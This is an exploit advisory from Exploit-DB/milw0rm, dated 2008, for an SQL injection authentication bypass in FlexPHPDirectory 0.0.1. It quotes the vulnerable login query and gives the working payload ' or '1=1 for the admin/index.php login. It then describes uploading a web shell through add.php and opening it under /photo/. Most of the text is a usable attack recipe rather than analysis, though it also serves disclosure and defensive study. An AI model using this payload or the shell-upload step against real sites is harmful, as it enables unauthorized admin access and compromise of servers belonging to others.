FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability

# Title: FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability
# EDB-ID: 7614
# CVE-ID: (2008-6749)
# OSVDB-ID: (51302)
# Author: x0r
# Published: 2008-12-29
# Verified: yes
# Download Exploit Code
# Download N/A

#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphpdiren
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpdir/
##############################################

Bug In \admin\usercheck.php 'n' \add.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";


Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Shell Upload:

Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^

Greetz: I Miss You...

# milw0rm.com [2008-12-29]